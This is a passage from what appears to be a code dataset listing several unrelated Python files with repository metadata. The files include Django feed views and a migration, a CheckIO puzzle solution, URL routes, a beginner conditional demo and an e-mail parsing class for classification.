        # query_all / query_by_platform / query_by_topic (previously this
        # view alone skipped the refresh, leaving sibling caches stale).
        keys = cache.keys(username + '*')
        update_all_cache.delay(keys)
    elif not paginator:
        flag = True  # cache miss: build inline below
    else:
        flag = False
    if flag:
        cached_query_group.delay(username, group_list[int(group)])
        all_contents = []
        for friend in friends:
            if friend.group == group_list[int(group)]:
                weibo_contents = friend.weibocontent_set.all()
                zhihu_contents = friend.zhihucontent_set.all()
                tieba_contents = friend.tiebacontent_set.all()
                content_type = ContentType.objects.get_for_model(WeiboContent)
                # Attach the generically-related Image rows to each weibo post.
                for content in weibo_contents:
                    if not content.is_repost:
                        if content.has_image:
                            content.images = Image.objects.filter(content_type=content_type, object_id=content.id)
                    else:
                        if content.origin_has_image:
                            content.origin_images = Image.objects.filter(content_type=content_type, object_id=content.id)
                all_contents += weibo_contents
                all_contents += zhihu_contents
                all_contents += tieba_contents
        all_contents.sort(key=lambda content: content.pub_date, reverse=True)
        paginator = Paginator(all_contents, 20)
    # Clamp out-of-range / non-integer page numbers instead of erroring.
    try:
        contents = paginator.page(page)
    except PageNotAnInteger:
        contents = paginator.page(1)
    except EmptyPage:
        contents = paginator.page(paginator.num_pages)
    group_list = list(enumerate(group_list))
    result = {'group_list': group_list,
              'topic_list': topic_list,
              'current_group': group,
              'contents': contents}
    return render(request, 'closends/display_group.html', result)
@csrf_exempt
@login_required
def query_by_topic(request, topic, page=1):
    """
    Render the feed filtered to the topic at index *topic* in topic_name,
    sorted by publication date descending, 20 items per page.
    """
    user = request.user.userinfo
    username = request.user.username
    friends = user.friend_set.all()
    group_list = user.group_list.split(',')
    group_list = list(enumerate(group_list))
    topic_list = list(enumerate(topic_name))
    # Per-user, per-topic paginator cache key.
    paginator = cache.get(username + '_' + topic_name[int(topic)] + '_paginator')
    updated_list = cache.get_or_set('updated_list', set())
    if username in updated_list:
        flag = True
        updated_list.remove(username)
        cache.set('updated_list', updated_list, None)  # None timeout -> cache forever
        cache.delete(username + '_' + topic_name[int(topic)] + '_paginator')
        # Asynchronously refresh every cached page belonging to this user.
        keys = cache.keys(username + '*')
        update_all_cache.delay(keys)
    elif not paginator:
        flag = True  # cache miss: build inline below
    else:
        flag = False
    if flag:
        cached_query_topic.delay(username, topic_name[int(topic)])
        all_contents = []
        for friend in friends:
            # Keep only content tagged with the requested topic label.
            weibo_contents = [content for content in friend.weibocontent_set.all() if content.topic == topic_name[int(topic)]]
            zhihu_contents = [content for content in friend.zhihucontent_set.all() if content.topic == topic_name[int(topic)]]
            tieba_contents = [content for content in friend.tiebacontent_set.all() if content.topic == topic_name[int(topic)]]
            content_type = ContentType.objects.get_for_model(WeiboContent)
            # Attach the generically-related Image rows to each weibo post.
            for content in weibo_contents:
                if not content.is_repost:
                    if content.has_image:
                        content.images = Image.objects.filter(content_type=content_type, object_id=content.id)
                else:
                    if content.origin_has_image:
                        content.origin_images = Image.objects.filter(content_type=content_type, object_id=content.id)
            all_contents += weibo_contents
            all_contents += zhihu_contents
            all_contents += tieba_contents
        all_contents.sort(key=lambda content: content.pub_date, reverse=True)
        paginator = Paginator(all_contents, 20)
    # Clamp out-of-range / non-integer page numbers instead of erroring.
    try:
        contents = paginator.page(page)
    except PageNotAnInteger:
        contents = paginator.page(1)
    except EmptyPage:
        contents = paginator.page(paginator.num_pages)
    result = {'group_list': group_list,
              'topic_list': topic_list,
              'current_topic': topic,
              'contents': contents}
    return render(request, 'closends/display_topic.html', result)
| [
"zg_hit2015@163.com"
] | zg_hit2015@163.com |
7aa3b4ca0b62347e16f42050d1394ef9da533dca | 93179ac11ded2454149ece61c51f2ef8227d3999 | /Profile/migrations/0001_initial.py | ae67e05ec494d69a3c633d64b168811ff31f9848 | [] | no_license | Hloni253/HloniSite | 9f14e51854f3dc5b411ef9e771e2fbfbe0227bad | dca7d335687ee8c9fc46b7a61143f8219961873d | refs/heads/main | 2023-06-26T01:22:58.318594 | 2021-07-28T13:47:56 | 2021-07-28T13:47:56 | 390,359,433 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,937 | py | # Generated by Django 3.1.7 on 2021-06-14 10:57
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """
    Auto-generated initial migration for the Profile app: creates the
    Groups, Profile and GroupComments models.  Do not hand-edit once the
    migration has been applied anywhere.
    """

    # First migration of this app.
    initial = True

    # Requires the initial migrations of the referenced apps plus the
    # project's (possibly swapped) user model.
    dependencies = [
        ('Notes', '0001_initial'),
        ('Videos', '0001_initial'),
        ('Sites', '0001_initial'),
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
    ]

    operations = [
        migrations.CreateModel(
            name='Groups',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=200)),
                ('description', models.CharField(max_length=500)),
                ('creator', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='GroupCreator', to=settings.AUTH_USER_MODEL)),
                ('members', models.ManyToManyField(blank=True, related_name='GroupMembers', to=settings.AUTH_USER_MODEL)),
                ('notes', models.ManyToManyField(blank=True, related_name='GroupNotes', to='Notes.Notes')),
                ('sites', models.ManyToManyField(blank=True, related_name='GroupSites', to='Sites.Sites')),
                ('videos', models.ManyToManyField(blank=True, related_name='GroupVideos', to='Videos.Videos')),
            ],
        ),
        migrations.CreateModel(
            name='Profile',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('slug', models.SlugField()),
                ('description', models.CharField(blank=True, max_length=500)),
                ('copied_notes', models.ManyToManyField(blank=True, related_name='Notes', to='Notes.Notes')),
                ('groups', models.ManyToManyField(blank=True, related_name='UserGroups', to='Profile.Groups')),
                ('saved_sites', models.ManyToManyField(blank=True, related_name='Sites', to='Sites.Sites')),
                ('saved_videos', models.ManyToManyField(blank=True, related_name='Videos', to='Videos.Videos')),
                ('user', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
            ],
        ),
        migrations.CreateModel(
            name='GroupComments',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('comment', models.TextField()),
                ('date', models.DateTimeField(auto_now=True)),
                ('group', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='Profile.groups')),
                ('user', models.ForeignKey(default=None, on_delete=django.db.models.deletion.CASCADE, related_name='GroupCommentUser', to=settings.AUTH_USER_MODEL)),
            ],
        ),
    ]
| [
"lehlohonolomotloung407@gmail.com"
] | lehlohonolomotloung407@gmail.com |
945d6816e65ddcd5afe591b18b6347226f66c943 | bd1e0d03a0b7f07a1b6154df96fe7b52653845a6 | /Elementary/Find Message.py | 0de03555a90025aab2bccbab86e9b7d80474e3a3 | [] | no_license | thuan06/checkio.org-solution | cb43a97f1e7f43c2f0051bf4c5bca7b2dd330aac | 5e6d1be80b5faaf1a19370a5f32e8bd82bf38f9b | refs/heads/master | 2016-09-06T03:40:24.899368 | 2014-12-18T13:46:35 | 2014-12-18T13:46:35 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 174 | py | __author__ = 'Thuan'
def find_message(text):
    """Return the message hidden in *text*: its uppercase letters, in order."""
    uppercase_letters = [ch for ch in text if ch.isupper()]
    return ''.join(uppercase_letters)
print find_message("How are you? Eh, ok. Low or Lower? Ohhh.")  # -> HELLO (Python 2 print statement)
| [
"thuan0610@gmail.com"
] | thuan0610@gmail.com |
20fb226181a168dd6671f5f065e241134074e33a | 91d1a6968b90d9d461e9a2ece12b465486e3ccc2 | /route53_write_f/dns-answer_test.py | f8d48671d2f746eca041962279f310374a54a8cc | [] | no_license | lxtxl/aws_cli | c31fc994c9a4296d6bac851e680d5adbf7e93481 | aaf35df1b7509abf5601d3f09ff1fece482facda | refs/heads/master | 2023-02-06T09:00:33.088379 | 2020-12-27T13:38:45 | 2020-12-27T13:38:45 | 318,686,394 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 390 | py | #!/usr/bin/python
# -*- codding: utf-8 -*-
import os
import sys
sys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(__file__))))
from common.execute_command import write_parameter
# url : https://awscli.amazonaws.com/v2/documentation/api/latest/reference/ec2/describe-instances.html
if __name__ == '__main__':
    """
    """
    # Delegates to the shared write_parameter(service, operation) helper
    # (from common.execute_command) for the AWS CLI "route53" service's
    # "test-dns-answer" operation.
    write_parameter("route53", "test-dns-answer")
"hcseo77@gmail.com"
] | hcseo77@gmail.com |
4e27f85e6e44ae509d32786234d293e24fc8af61 | 7862625fabc748a5a44ff99b6ad5af53c973795f | /solsapp/urls.py | 9a25ba4f1c9dc0ec1d174ae91531bdc941d3d7e3 | [] | no_license | RakeshThirunahari/sols | 81eefcca9aab8552ac43a0a9bc3ab2a018443e8c | 0cd0d15d5d8d8c04e9cd8f197a0f71cd63e1c5b0 | refs/heads/main | 2023-02-26T03:02:05.246958 | 2021-02-02T16:39:00 | 2021-02-02T16:39:00 | 335,319,465 | 0 | 0 | null | 2021-02-03T08:28:59 | 2021-02-02T14:39:20 | HTML | UTF-8 | Python | false | false | 472 | py | from django.urls import path
from . import views
urlpatterns = [
    # Home page and list overview.
    path('', views.home, name = 'SolsHome'),
    path('List', views.listview, name = 'SolsList'),
    # Table metadata / table row endpoints.
    path('GetTableMeta', views.tablemeta, name = 'tablemeta'),
    path('GetTableData', views.tabledata, name = 'tabledata'),
    # List creation and editing.
    # NOTE(review): the 'CreateList' route is named 'updatetabledata' --
    # looks like a copy/paste slip; confirm no template reverses this name
    # before renaming.
    path('CreateList', views.createnewlist, name = 'updatetabledata'),
    path('NewList', views.newlist, name = 'Newlist'),
    path('EditList', views.editlist, name='Editlist'),
] | [
"rakesh.thirunahari@dhl.com"
] | rakesh.thirunahari@dhl.com |
6d6553258075a28f63b269f8f5e0ee499ae45d71 | 37ae8b0ecafd03bae01786b3fe7fc05b83f522a3 | /condicionais_finished.py | ad5c4cdf75df320b56124c5b3e19c48b6a690609 | [] | no_license | leocoelhodev/descobrindopython | a5d6b860ab05d9bf9e6840c660dbace39c8f20bf | f46da632347dd80fc52e1987b5cd69a992fe039e | refs/heads/main | 2023-05-27T04:25:30.535286 | 2021-06-15T10:28:45 | 2021-06-15T10:28:45 | 377,123,106 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 263 | py | #
# Arquivo de exemplo das estruturas condicionais
#
def Condicionais():
    """Demonstrates if/elif/else by comparing two equal values and printing the result."""
    first, second = 1000, 1000
    if first == second:
        print("x é igual a y")
    elif first < second:
        print("x é menor do que y")
    else:
        print("x é maior do que y")
Condicionais() | [
"noreply@github.com"
] | noreply@github.com |
da4a6176bb44dd1e86e92d95b07eb36559743ae1 | 0c329252674b5d17f0b7f0685cb1ee3d06493475 | /email_classifier/email.py | 538bfdd72a1cba8b6895d512cedf317e53c29fc3 | [] | no_license | griffy/cs1573 | 56f12db035e8206ad3ac92aac38e4731b6edff13 | 52094dd9a7ef1cfc2abf4d87a7d494076cfe23c5 | refs/heads/master | 2021-01-10T11:00:12.347510 | 2013-04-14T21:17:41 | 2013-04-14T21:17:41 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,992 | py | import re
import os
# Header-line matchers: each pattern is anchored with '^', so with
# re.search on a single line it is equivalent to a startswith() test.
to_regex_obj = re.compile(r"^X-To:.*", flags=re.UNICODE)
cc_regex_obj = re.compile(r"^X-cc:.*", flags=re.UNICODE)
bcc_regex_obj = re.compile(r"^X-bcc:.*", flags=re.UNICODE)
# The X-FileName header is the last header line; the body follows it.
body_regex_obj = re.compile(r"^X-FileName:.*", flags=re.UNICODE)
from_regex_obj = re.compile(r"^X-From:.*", flags=re.UNICODE)
date_regex_obj = re.compile(r"^Date:.*", flags=re.UNICODE)
subject_regex_obj = re.compile(r"^Subject:.*", flags=re.UNICODE)
# Captures the two-digit hour out of an "HH:MM:SS" timestamp.
tod_regex_obj = re.compile(r'.*(\d{2}):\d{2}:\d{2}.*', flags=re.UNICODE)
# Captures the display-name part of "Name <address>" (text before '<').
name_regex_obj = re.compile(r"(.*)<", flags=re.UNICODE)
# Captures everything before '@' in an e-mail address.
at_regex_obj = re.compile(r"(.*)@", flags=re.UNICODE)
# Matches any character that is not a word char, whitespace, "'" or "-",
# plus '_' (which \w would otherwise keep).
nonword_char_regex_obj = re.compile(r'[^\w\s\'\-]|_', flags=re.UNICODE)
def parse_email(uri):
    """
    Takes a URI to a file containing an email and returns
    a tuple containing the following attributes:
    (datetime, from, to, cc, bcc, subject, body)
    """
    # Header tag -> last value seen for it (later occurrences overwrite).
    headers = {'Date:': '', 'X-From:': '', 'X-To:': '',
               'X-cc:': '', 'X-bcc:': '', 'Subject:': ''}
    body_lines = []
    in_body = False
    with open(uri, 'r') as email:
        for line in email.readlines():
            if in_body:
                # Drop blank lines that precede the first body line.
                if body_lines or line.strip():
                    body_lines.append(line)
            elif line.startswith('X-FileName:'):
                # Everything after the X-FileName header is the body.
                in_body = True
            else:
                for tag in headers:
                    if line.startswith(tag):
                        headers[tag] = line[len(tag):].strip()
                        break
    return (headers['Date:'], headers['X-From:'], headers['X-To:'],
            headers['X-cc:'], headers['X-bcc:'], headers['Subject:'],
            ''.join(body_lines))
class Email(object):
    """
    Given a URI to an email file, parses its contents and stores relevant
    information as attributes.

    The name of the directory containing the file is used as the email's
    classification label.  Word lists and per-word frequencies over the
    body are computed lazily and cached.
    """

    def __init__(self, uri):
        self.uri = uri
        self.classification = os.path.split(os.path.dirname(uri))[1]

        fields = parse_email(uri)
        self.datetime = fields[0]
        self.header_from = fields[1]
        self.header_to = fields[2]
        self.header_cc = fields[3]
        self.header_bcc = fields[4]
        self.subject = fields[5]
        self.body = fields[6]

        self.words = None          # lazy cache for get_words()
        self.frequencies = {}      # word -> occurrence count cache
        self.max_frequency = None  # lazy cache for max_word_frequency()

    def _extract_name(self, contact):
        """
        The names in the 'to, from, cc, bcc' sections of an email are often very muddy.
        This is an attempt to normalize them to an extent.
        - Sometimes its <name> <address>, <n2> <a2>,... :- just want names
        - Sometimes of the form first.last@company :- just want first last
        """
        name_groups = name_regex_obj.search(contact)
        if name_groups:
            contact = name_groups.group(1)
        at_groups = at_regex_obj.search(contact)
        if at_groups:
            # first.last@company -> "first last"
            contact = contact.split('@')[0]
            contact = contact.replace('.', ' ')
        contact = contact.replace('\"', '')
        return contact.strip()

    def _extract_names(self, header_field):
        """
        Given a header field (string), returns a list of the real names contained within
        """
        names = []
        for contact in header_field.split(','):
            name = self._extract_name(contact)
            if name:
                names.append(name)
        return names

    def get_from_names(self):
        """
        Returns a list of names found in the X-From field
        """
        return self._extract_names(self.header_from)

    def get_to_names(self):
        """
        Returns a list of names found in the X-To field
        """
        return self._extract_names(self.header_to)

    def get_cc_names(self):
        """
        Returns a list of names found in the X-cc field
        """
        return self._extract_names(self.header_cc)

    def get_bcc_names(self):
        """
        Returns a list of names found in the X-bcc field
        """
        return self._extract_names(self.header_bcc)

    def get_sender_name(self):
        """
        Returns the sender of this email
        """
        return self.get_from_names()[0]

    def get_receiver_names(self):
        """
        Returns a list of names of receivers of this email
        """
        return self.get_to_names() + self.get_cc_names() + self.get_bcc_names()

    def get_names(self):
        """
        Returns a list of all names in the header of the email
        """
        return self.get_from_names() + self.get_receiver_names()

    def get_hour(self):
        """
        Returns the hour the email was received (0..24).
        Raises ValueError when the Date header has no HH:MM:SS timestamp.
        """
        hours_obj = tod_regex_obj.search(self.datetime)
        if hours_obj:
            # group(1) is the two-digit hour (was the obscure groups(1)[0]).
            return int(hours_obj.group(1))
        raise ValueError("Hour not found")

    def get_month(self):
        """
        Returns the month the email was received as a three-letter abbreviation.
        Raises ValueError when no month abbreviation is present.
        """
        # Order preserved from the original if/elif chain (Nov before Oct);
        # the abbreviations are unambiguous so the order does not matter.
        for abbr in ('Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun',
                     'Jul', 'Aug', 'Sep', 'Nov', 'Oct', 'Dec'):
            if re.search(abbr, self.datetime, re.IGNORECASE):
                return abbr
        raise ValueError("Month not present")

    def get_time_of_day(self):
        """
        Buckets the hour of receipt into 'morning' (6-8), 'work' (9-17),
        'evening' (18-21) or 'night' (22-5).
        """
        hour = self.get_hour()
        if hour in range(9, 18):
            return 'work'
        elif hour in range(18, 22):
            return 'evening'
        elif hour in range(22, 25) or hour in range(0, 6):
            return 'night'
        elif hour in range(6, 9):
            return 'morning'

    def get_words(self):
        """
        Returns a list of all words in the body of the email
        """
        if self.words is not None:
            return self.words
        # Replace non-word characters with spaces and lowercase everything.
        word_character_string = nonword_char_regex_obj.sub(' ', self.body)
        word_character_string = word_character_string.lower()
        words = word_character_string.split()
        # Strip stray quote/hyphen characters from word edges.
        words = [word.strip("'-") for word in words]
        # Remove non-words ("--" or "''" never occur inside real words).
        # List comprehensions (not filter()) so the cached value is a real
        # list; under Python 3 filter() returns an iterator, and caching it
        # would exhaust it after the first use.
        words = [word for word in words if "--" not in word and "''" not in word]
        self.words = words
        return words

    def count(self, word):
        """
        Counts the occurrences of the given word in the email
        """
        if word not in self.frequencies:
            count = 0
            for doc_word in self.get_words():
                if word == doc_word:
                    count += 1
            # cache the result
            self.frequencies[word] = count
        return self.frequencies[word]

    def contains(self, word):
        """
        Checks the existence of a word in an email
        """
        # Delegates to count() so the frequency cache is populated/reused
        # (the old implementation recomputed the scan on every call).
        return self.count(word) > 0

    def max_word_frequency(self):
        """
        Returns the maximum frequency of any word in the email
        """
        if self.max_frequency is None:
            # Single O(n) tally instead of calling count() per word (which
            # rescanned the whole word list for every word).
            freq = {}
            for word in self.get_words():
                freq[word] = freq.get(word, 0) + 1
            # Preserve the old side effect of filling the frequency cache.
            self.frequencies.update(freq)
            self.max_frequency = max(freq.values()) if freq else 0
        return self.max_frequency
| [
"joel@joel-griffith.com"
] | joel@joel-griffith.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.